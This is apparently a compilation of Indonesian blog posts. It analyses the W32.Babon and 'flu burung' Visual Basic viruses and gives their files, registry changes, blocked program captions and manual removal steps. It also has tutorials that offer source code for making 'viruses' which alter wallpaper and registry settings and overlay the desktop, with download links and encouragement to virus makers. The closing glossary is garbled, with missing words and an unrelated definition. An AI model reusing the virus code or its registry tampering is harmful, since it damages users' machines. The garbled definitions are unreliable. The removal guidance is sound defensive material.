- File IExplorer.exe yang ada di C:\Windows\System32 dan disembunyikan dengan cara men-set attribut file menjadi hidden
- File shell.exe yang ada di C:\Windows\System32 dan disembunyikan dengan cara men-set attribut file menjadi hidden
- Babon.scr yang ada di C:\Windows\System32 dan disembunyikan dengan cara men-set attribut file menjadi hidden dan di tiap drive
- Csrss.exe yang ada di folder C:\Documents And Settings\User\Local Settings\Application Data\Windows
- smss.exe yang ada di folder C:\Documents And Settings\User\Local Settings\Application Data\Windows
- lsass.exe yang ada di folder C:\Documents And Settings\User\Local Settings\Application Data\Windows
- Empty.pif di direktori Documents and Settings\All User\Start Menu\Programs\Startup
- Winlogon.exe di direktori Application Data\Windows\


Virus juga membuat file yang sama dengan nama diatas, Cuma bedanya sebelum extensi file diberi spasi, misal nama file cewek_imoet.exe, virus juga akan membuat file cewek_imoet[spasi].exe jadi nama file aslinya cewek_imoet .exe, gunanya adalah untuk mengacaukan perintah penghapusan di DOS (Diskette Operating System), karena dengan adanya spasi tersebut, file dianggap sebuah parameter, bukan sebuah file.


FILE YANG DIINFEKSI
Virus mencari dan menginfeksi file dengan ekstensi seperti di bawah ini, untuk itu BACKUPLAH HARDISK ANDA:
MP3
MP4
MPG
MPEG
AVI
DAT
WMV
JPG
GIF
JPEG
PNG
ASX
DOC
XLS
WMA
MDB
Dan ekstensi EXE tentunya....


BLOCKING PROGRAM
Virus juga memblocking program yang mempunyai caption sbb:
"TASK"
"REG"
"ASM"
"DBG"
"W32"
"BUG"
"HEX"
"DETEC"
"PROC"
"WALK"
"FUC"
"SEX"
"REST"
"AVAS"
"OPTIONS"
"FORMAT"
"RebarWindow32"
"ComboBoxEx32"
"ComboBox"
"Edit"
"ANTI"
"VIRUS"


PESAN – PESAN YANG DIMUNCULKAN
- Pesan yang dimunculkan dapat dilihat di file wangsit.txt yang ada di tiap drive

Babon
Wahai kalian teman2 ku dimanapun berada.. hehehe
Lagi beapa nih wal? ngenet kah? chatting ? Kuliah yang bujur lah...
Jangan terlalu banyak bejalanan n menghabiskan waktu pakai hal2 yang kda penting
Beuh..pina musti nda ni lah. Hahaha..:)
Just wanna say : Hello Friend.. Moci-moci ^^
Sampit Community..
Peace Man..
By : Anak Sampit yang lagi menuntut ilmu di pulau seberang

Beh beh beh kadak ngarti ikam, ini banjarsari ato Banjarmasin gituh…hahahahahah!
- Pesan virus juga muncul pada saat windows pertama kali login
Welcome to Babon Computer
Please enjoy the babon entertaintment

MANIPULASI REGISTRI

W32.babon memanipulasi beberapa registry yang ada di windows, yaitu:

HKEY_LOCAL_MACHINE, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKEY_LOCAL_MACHINE, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"
HKEY_LOCAL_MACHINE, SOFTWARE\Classes\exefile, Default,0, “application”
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt, type,0, “Checkbox”
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, type,0, “Checkbox”
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden, type,0, “group”
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run,MsPatch
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Mspatch
HKEY_LOCAL_MACHINE, SOFTWARE\Classes\exefile, NeverShowExt
HKEY_CURRENT_USER, Software\Policies\Microsoft\Windows\System, DisableCMD

Hati - hati virus ini juga melakukan manipulasi terhadap userinit.exe yang dilakukan oleh virus flu burung dengan jurus terkenalnya tendang login beibeh.
Manipulasi lainnya dilakukan di registry dengan alamat:
CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ yang berguna untuk merubah Computer name menjadi Komputer babon Nih
CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ yang berguna untuk merubah Recycle Bin menjadi Babon Suka Kebersihan
Virus ini juga menggunakan perintah dari modul shell32.dll yang berguna untuk menjalankan beberapa perintah di windows secara otomatis.

BACKUP VIRUS
Virusnya karena dibuat pakek vb jadi dia menggandakan file msvbvm60.dll ke drive yang ada di komputer di direktori c:\windows dan di c:\windows\system32

PENANGGULANGAN

Pemulihannya emang laen dari yang laen, untuk mematikan prosesnya aja syusyah banget... kita seperti berkejar – kejaran dengan mereka...hmm... mungkin tugas para virologers untuk membuat blocking proses untuk virus w32.babon ini...okay...tapi untuk menendang proses ini anda dapat mendonlot program virus acepmp, viremover yang ada di alamat ini:


Donlot acep.scr dan autorun.inf (acep.zip) untuk tendang process

1. Donlot file acep.scr dan autorun.inf di www.virologi.info
Donlot acep.scr dan autorun.inf (acep.zip) untuk tendang process
2. Kemudian copy file tersebut ke flashdisk anda, taruh di root direktori di flashdisk atau diluar direktorinya
3. Kemudian sambungkan flashdisk ke cpu anda
4. Jalankan file acep.scr, jalankan 2, 3 atau 4 kali untuk membunuh proses virus
5. Hapus file yang ada di daftar berikut:
- Cewek_Imoet.exe, mempunyai icon folder berwarna kuning yang ada di tiap drive C:, D:, E: dan lain – lain
- File_Rahasia THE HUNTER.exe , mempunyai icon folder berwarna kuning yang ada di tiap drive C:, D:, E: dan lain – lain
- File IExplorer.exe yang ada di C:\Windows\System32 dan disembunyikan dengan cara men-set attribut file menjadi hidden
- File shell.exe yang ada di C:\Windows\System32 dan disembunyikan dengan cara men-set attribut file menjadi hidden
- Babon.scr yang ada di C:\Windows\System32 dan disembunyikan dengan cara men-set attribut file menjadi hidden dan di tiap drive
- Csrss.exe yang ada di folder C:\Documents And Settings\User\Local Settings\Application Data\Windows
- smss.exe yang ada di folder C:\Documents And Settings\User\Local Settings\Application Data\Windows
- lsass.exe yang ada di folder C:\Documents And Settings\User\Local Settings\Application Data\Windows
- Empty.pif di direktori Documents and Settings\All User\Start Menu\Programs\Startup
- Winlogon.exe di direktori Application Data\Windows\

6. Hapus alamat registry ayng dimanipulas virus yang ada di:
HKEY_LOCAL_MACHINE, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKEY_LOCAL_MACHINE, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"
HKEY_LOCAL_MACHINE, SOFTWARE\Classes\exefile, Default,0, “application”
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt, type,0, “Checkbox”
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, type,0, “Checkbox”
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden, type,0, “group”
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run,MsPatch
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Mspatch
HKEY_LOCAL_MACHINE, SOFTWARE\Classes\exefile, NeverShowExt
HKEY_CURRENT_USER, Software\Policies\Microsoft\Windows\System, DisableCMD


7. Cari file .exe dengan ukuran 91,4 kb dengan folder icon warna kuning, kemudian hapus
8. Scan hardisk anda dengan WAV 2005 update-an terbaru

Jika belum bisa jugak pakai cara pamungkas untuk membunuh virus:
1. Booting dengan cd win xp
2. Kemudian tekan ‘R’ untuk repair
3. Isi password administrator
4. Pilih drive dimana windows di install, yaitu dengan menekan tombol 1,2 atau 3
5. Ganti file msvbvm60.dll dan msvbvm50.dll dengan nama lain misalnya msvbvxxx.xxx atau nama lain, file tersebut terletak di:
C:\Windows
C:\windows\system32
Atau di root direktori di C:, D:, atau lainnya, maksud root direktori ya diluar direktori gitu...
6. Kemudian booting dan masuk ke windows
7. Otomatis file virus tidak berjalan karena virus harus mengakses file msvbvm60.dll terlabih dahulu sebelum menjalankan kode-kodenya

VIRUS Pemakan File MS Word

Ternyata gagak tidak hanya sebagai burung pemakan daging, tapi di dunia cyber, gagak atau raven memakan file – file Microsoft word anda, WATCH OUT for this virus…

Code Name : w32.fluburung@raven.com
Nilai crc32 : 92CCA704 dan BDB819EB
Besar File : 104 Kb

Mulai lagi virus yang memakan file .doc atasu dokumen microsoft word anda, untuk itulah pentingnya sistem restore di sini, coba baca lagi artikel di virologi dengan alamat :
http://virologi.info/virologist/modules/news/article.php?storyid=85
Hanya itu cara P3K untuk mengembalikan file – file dokumen microsoft word anda, karena virus ini menyisipkan kode ke dokumen word anda, sehingga dokumen word menjadi rusak. Virus juga mengubah icon microsoft word anda mejadi icon Microsoft Word XP dan mengubah ekstensi file menjadi .scr seperti pada gambar di bawah ini:


Tetapi seperti gambar di atas virus tidak merubah nama dan ukuran file, hebat, kemajuan…kenapa?Karena virus memakai packer dotFix FakeSigner v2.2, yaitu pembungkus virus yang dapat mengelabui Hexeditor, yaitu dengan cara menyembunyikan PE Header File agar pembungkusnya tidak kelihatan. Sebenarnya Pembungkus file yang asli adalah Aspack dan virus tersebut dapat dibukai memakai software Unaspack atau AspackDie. Maka kelihatan ukuran asli file virus adalah 104 Kb.


MELIHAT PESAN VIRUS
Untuk melihat Pesan virus, cukup ikuti langkah berikut:
1. Unpack file virus dengan program pembongkar Aspackdie
2. Maka file yang tadi berukuran sejumlah file doc yang belum terinfeksi menjadi 104 kb. Misalnya file doc-nya sebelumnya berukuran 1,224 Kb, maka sehabis dibongkar pembungkusnya menjadi berukuran 104 kb.
3. Ganti ekstensi file dari .scr menjadi .doc, kemudian buku memakai MS WORD, maka akan terlihat pesan sbb :


======= FLU BURUNG =======

| |

= Oleh-oleh dari AMBON.. =

| Katong pung jua bisa |

==========================

==========================





Bugs Bunny say "What's up doc?"
Duffy Duck say "I'm infected doc"
So at the end of story they save the screen.

PAJAK? Semua hal kena pajak!
Barang mewah kena pajak, nabung di bank tiap bulan potong pajak,
penghasilan kena pajak, sampai makanan pun kena pajak.
Indonesia penuh dengan pajak! Tidak heran penuh pembajak.
Orang bijak bayar pajak, takut pajak jadi pembajak.
Cuma udara yang dihirup yang tidak kena pajak, namun sudah tercemar
dengan asap dan polutan. "Tanya kenapa?"
(Raven codename "05062705056127019455")


MSG (Monosodium Glutamat) merupakan penyebab kebodohan yang berakibat kemalasan.
Pantas bangsa Indonesia tidak bisa maju karena bangsanya bodoh.
Hampir semua produk makanan Indonesia menggunakan MSG.
Pemerintah harus segera menghapuskan penggunaan MSG dipasaran!
Mungkin karena para pejabat dan wakil rakyat otaknya juga sudah penuh dengan MSG,
jadi tidak dapat berpikir dengan benar!
Atau mereka terpilih karena terpintar diantara yang terbodoh,
ataukah memang sengaja membodohkan bangsa agar dapat korupsi dangan leluasa?
(Raven codename "05062705056127019455")


Flu burung, masa sich burungnya bisa flu? Tanya kenapa?
Awas bahaya flu burung, bahaya lo? Bisa RIP tau?
(RIP "Rest in Peace"/Constantine)
Rupiah kebanyakan angka! (Okinawa)
Dimana sebenarnya pemerintah ??????
Pemerintah sekarang ini lebih memilih uang uang dan uang.
Malahan sekarang lebih lebih untuk masalah pilkada pilkada dan pilkada.
Kita sebagai mahasiswa dan masyarakat merasa terasingkan dari perhatian pemerintah.
Tanya kenapa ????
Lihat saja pengangguran banyak sekali!!!
Sebenarnya siapa yang bisa ngomongin dengan pemerintah ?????
Aku????? Ga mungin lagi.
Tapi mudah-mudahan pemerintah sadar sendiri aja yaaa!!!
Slamat Muaaach!!!

Idiiih....!
What ta gud message……



MANIPULASI REGISTRY
Virus ini memanipulasi registri anda pada alamat:

HKLM/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”
HKCU/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”

FILE INDUK VIRUS
Kali ini file induk virus tidak berada di C:\Windows atau di C:\Windows\System32, tapi berada di d:\Recycle Bin dengan nama SVCHOST.EXE dengan icon Folder Berwarna Kuning atau Icon MS Word

KEBIASAAN VIRUS
Pada jam tertentu akan memunculkan pesan seperti pada pesan diatas, atau memunculkan kotak yang berisi ‘Masukkan nama – nama orang sakti:’, jika tidak memasukkan nama – nama orang tersebut maka komputer akan restart atau mengunci system, jika ada pertanyaan seperti itu masukkan saja nama orang2 yang ‘mungkin’ anggota komunitas dari virus ini, yaitu:

SpiderWeb
MoonDance
NigthStalker
Raven

Kemudian ada pertanyaan, lagi pilih makan atau mati…wah wah wah makin kreatip aja ini orang…..

PENANGGULANGAN

1. Donlot showkillprocess.exe dan WAV 2005 yang ada di www.virologi.info/download
2. Matikan proses SVCHOST.EXE yang mempunyai Base Priority dan Point Of Threads 8 dan 1
3. Scan salah satu folder (dengan signatures.db , bisa didonlot di www.virologi.info/download/signatures.db dengan WAV 2005, yang berguna untuk membuka kunci registry dan menampilkan file hidden.
4. Hapus Registry yang ada di alamat berikut:

HKLM/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”

HKCU/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”

5. hapus File induk virus dengan nama SVCHOST.EXE yang ada di D:\Recycle Bin
6. Cari file dengan ekstensi *.scr dengan icon MS WORD, kemudian hapus file tersebut.


PENANGGULANGAN UNTUK FILE YANG HILANG

Untuk file word yang hilang anda dapat menggunakan SYSTEM RESTORE yang ada di windows, dengan catatan kalian tau tanggal berapa system kalian belum terkena virus, kemudian ikuti cara untuk me-Restore System di artikel:

http://virologi.info/virologist/modules/news/article.php?storyid=85

Virus Wallpaper

Banyak virus lokal yang membuat kita bertanya. kok virus bisa ngeset wallpaper komputer kita ya? lalu dari mana virus dapet gambar dirinya? misal virus wayang yang menset wallpaper,dan Toolbar dari Windows Explorer korbannya dengan gambar wayang lalu bagaimana gambar tersebut dapat ada di komputer kita? tentusaja virus makernya menyertakan gambar tersebut dalam tubuh virus, lalu mencoba mengeluarkan gambar tersebut ke komputer korban (semacam beranak gambar) menuliskan source yang mengubah registry untuk menset wallpaper dan Toolbar dari Windows Explorer. lalu bagaimana virus tersebut bisa mencopykan gambar ke komputer korban? ini adalah script yang aku otak-atik sendiri...

mula2 aku cari project paint(visualbasic) setelah dianalisis ternyata ada save-nya (wew...satu pintu terbuka) lalu aku berpikir bagaimana project ini bisa mensave sendiri pada saat project ini dijalankan? berarti perintah save harus di ubah ke bagian form_load

coba lagi.. perintah save sudah langsung berjalan..tapi kok aku masih harus menuliskan namaGambar dan menekan tombol save? baru gambar tersimpan.. gimana caranya bisa langsung tanpa menulis namaGambar?

otak-atik sourcenya


'Set The File Name To "" (Blank)--->kosong tanpa nama

.FileName = "C:\WINDOWS\system\OEMLOGO.bmp"--->kita kasi nama,sekaligus pengalamatannya ke C:\WINDOWS\system

lalu save

SavePicture frmDocument.PicBox.Image, .FileName

Private Sub Form_Load()
Save_Gambar '---------->jump to Private Sub Save_Gambar()

lalu bagaimana virus mengubah registry untuk menset wallpaper,Toolbar dari Windows Explorer?

virus maker mengubah bagian

HKCU\Control Panel\Desktop-Wallpaper value data:C:\WINDOWS\system\OEMLOGO.bmp-->alamat peranakan gambarVirus HKCU\Control Panel\Desktop\OriginalWallpaper
HKCU\Control Panel\Desktop\ConvertedWallpaper--->yang pling jelas dlm mense walpaper

HKU\DEFAULT\Control Panel\Desktop\SCRNSAVE.EXE

HKU\DEFAULT\Control Panel\Desktop\Wallpaper

HKCU\Software\Microsoft\Internet Explorer\Toolbar--->toolbar

tentunya juga dibagian form_load/fungsi timer

------------------

' SET BACKGROUND

cek = AmbilString(HKCU, "Control Panel\Desktop", "Wallpaper")
If cek = "" Then

BuatString HKCU, "Control Panel\Desktop", "Wallpaper", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

cek = AmbilString(HKCU, "Control Panel\Desktop", "OriginalWallpaper")

If cek = "" Then

BuatString HKCU, "Control Panel\Desktop", "OriginalWallpaper", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

cek = AmbilString(HKCU, "Control Panel\Desktop", "ConvertedWallpaper")

If cek = "" Then

BuatString HKCU, "Control Panel\Desktop", "ConvertedWallpaper", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

cek = AmbilString(HKU, ".DEFAULT\Control Panel\Desktop", "SCRNSAVE.EXE")

If cek = "" Then

BuatString HKU, ".DEFAULT\Control Panel\Desktop", "SCRNSAVE.EXE", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

cek = AmbilString(HKU, ".DEFAULT\Control Panel\Desktop", "Wallpaper")


If cek = "" Then

BuatString HKU, ".DEFAULT\Control Panel\Desktop", "Wallpaper", "C:\WINDOWS\system\OEMLOGO.bmp"


End If

'==========

'set Toolbar dari Windows Explorer

cek = AmbilString(HKCU, "Software\Microsoft\Internet Explorer", "Toolbar")

If cek = "" Then

BuatString HKCU, "Software\Microsoft\Internet Explorer", "Toolbar", "C:\WINDOWS\system\OEMLOGO.bmp"

End If


sekarang uda ga bertanya2 lagikan kok virus bisa bikin ulah gitu? hanya virus maker yang selalu berpikir diluar batas2nya dan selalu berimajenasi dengan karyanya

untuk download nya disini...

download

download vidio



moga yang dikit ini bisa bermanfaat untuk menambah ilmu..

Virus Cacar di Komputer

Hmmm………
Masihkah anda ingin membuat virus dengan mengotak-atik tampilan desktop.?
Yah seperti artikel-artikel yang sebelumnya aku ingin membagikan ilmu mengenai script membuat virus dengan tampilan yang membuat desktop menjadi bintik-bintik.


Virus ini aku beri nama virus cacar.. hmm kenapa cacar yah.? Ya karena bintik-bintik yang sangat banyak yang terjadi pada desktop. Masak mau dikasih nama virus jerawat.? Ato malah virus kutil.? Wakakakakakakakak…………………….
Lihat gambar dibawah ini.

http://h1.ripway.com/nonickname/virus-cacar-di-komputer.JPG

Ya sudah tanpa banyak basa-basi mari kita mulai pembuatan virus cacar.
Virus ini masih dibuat dengan menggunakan Visual Basic 6
Terdiri atas :
-form
-timer
-module
Agar lebih mudah akan saya tuliskan scriptnya
Berikut adalah script virus cacar.
==============script pada form dan timer=========================
Private Sub Timer1_Timer()

Call GetCursorPos(m)

If m.x = x And m.y = y Then
sum = sum + 25
Else
x = m.x
y = m.y
End If

If sum = 2000 Then
sum = 0
BitBlt Form1.hDC, 0, 0, Screen.Width / Screen.TwipsPerPixelX, Screen.Height / Screen.TwipsPerPixelY, ha, 0, 0, vbSrcCopy
Call SetWindowPos(Form1.hwnd, HWND_TOPMOST, 0, 0, Screen.Width / Screen.TwipsPerPixelX, Screen.Height / Screen.TwipsPerPixelY, SWP_SHOWWINDOW)
ready = True
End If

End Sub
==========================END SCRIPT==============================
Berikutnya adalah pada bagian module…
Module terdiri atas script seperti berikut.

==========SCRIPT MODULE======================================
Public Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long
Public Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long
Public Declare Function GetDesktopWindow Lib "user32" () As Long
Public Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
Public Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Public Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long

Public Type POINTAPI
x As Long
y As Long
End Type

Public Const HWND_TOPMOST = -1
Public Const SWP_SHOWWINDOW = &H40

Public m As POINTAPI
========================End Script=====================

Bagi seorang VM mungkin script diatas terlalu mudah untuk di rubah-rubah, untuk itu silahkan kembangkan sendiri sesuai dengan kemampuan.
Hmmm… bagi yang ingin mendownload secara lengkap source code diatas dapat di download dengan mudah di bawah ini.

Download source virus cacar secara lengkap

download

Jenis Jenis Virus Komputer

Virus Resident adalah Program virus yang menetap di memori.

Arti istilah Residental Gateway dianggap berkaitan erat dengan pengertian berikut : CPE (Costumer Premises Equipment) yang menjalankan XGCP dan memiliki koneksi ke suatu jaringan VoIP serta koneksi ke perangkat telephony pengguna.

Virus life circle :
Siklus hidup virus. Virus mengalami siklus hidup empat fase, yaitu:
1. Fase tidur (dormant phase),
2. Fase propaganda (propagation phase),
3. Fase pemicuan (triggering phase),
4. Fase eksekusi (execution phase).

Anti Virus adalah Program untuk melacak keberadaan dan mengamankan virus pada media penyimpanan, baik pada disk maupun memory.

Trojan horse
Rutin tak terdokumentasi rahasia ditempelkan dalam satu program berguna. Program yang berguna mengandung kode tersembunyi yang ketika dijalankan melakukan suatu fungsi yang tak diinginkan. Eksekusi program menyebabkan eksekusi rutin rahasia ini. Program trojan horse digunakan untuk melakukan fungsi-fungsi secara tidak langsung dimana pemakai tak diotorisasi tidak dapat melakukannya secara langsung. Contoh untuk dapat mengakses file-file pemakai lain pada sistem dipakai bersama, pemakai dapat menciptakan program trojan horse. Trojan horse ini ketika program dieksekusi akan mengubah ijin-ijin file sehingga file dapat dibaca oleh sembarang pemakai. Program trojan horse yang sulit dideteksi adalah kompilator yang dimodifikasi sehingga menyisipkan kode tambahan ke program-program tertentu ketika dikompilasi, seperti program login. Kode menciptakan Trapdoor pada program login yang mengijinkan pencipta log ke sistem menggunakan password khusus. Trojan horse ini tak pernah dapat ditemukan jika hanya membaca program sumber. Motifasi dari trojan horse adalah penghancuran data. Program muncul sebagai melakukan fungsi-fungsi berguna, seperti kalkulator, tapi juga secara diam-diam menghapus file-file pemakai. Trojan horse biasa ditempelkan pada program-program atau rutin-rutin yang diambil dari BBS, internet, dan sebagainya.

Worm :
yang dapat mereplikasi dirinya dan mengirim beberapa kopian dari komputer ke komputer lewat hubungan jaringan. Begitu tiba, worm diaktifkan untuk dan kembali. Selain propagasi, worm biasanya melakukan fungsi yang tak diinginkan. Network worm menggunakan hubungan jaringan untuk menyebar dari sitem ke lain. Sekali aktif di suatu sistem, worm dapat berlaku seperti atau , atau menempelkan program atau melakukan sejumlah aksi menjengkelkan atau menghancurkan. Untuk mereplikasi dirinya, network worm menggunakan suatu layanan jaringan, seperti:
- fasilitas ,
- kemampuan eksekusi jarak jauh,
- kemampuan jarak jauh.
Singkatan dari Write Once-Read Many (WORM).

Pengertian Virus

Virus Komputer adalah kode yang ditempelkan dalam satu yang menyebabkan pengkopian dirinya disisipkan ke satu program lain atau lebih. Program program-program lain dengan program-program itu. Modifikasi itu termasuk memasukkan kopian program program virus yang kemudian dapat menginfeksi program-program lain. Selain hanya propagasi, salah satu ini biasanya melakukan fungsi yang tak diinginkan. Seperti virus biologis, pada kode instruksi yang dapat membuat kopian sempurna seperti dirinya. Ketika komputer yang terinfeksi berhubungan dengan yang belum terinfeksi, virus memasuki program baru. Infeksi dapat menyebar dari komputer satu ke yang lainnya melalui yang digunakan , atau mengirimkan program melaui . Pada lingkungan jaringan, kemampuan mengakses aplikasi dan komputer lain merupakan fasilitas sempurna penyebaran virus. Sebuah virus dapat berisi tertentu yang diisikan oleh virus. Rutin-rutin ini bisa saja berisi perintah perusakan atau hanya sekedar menampilkan pesan.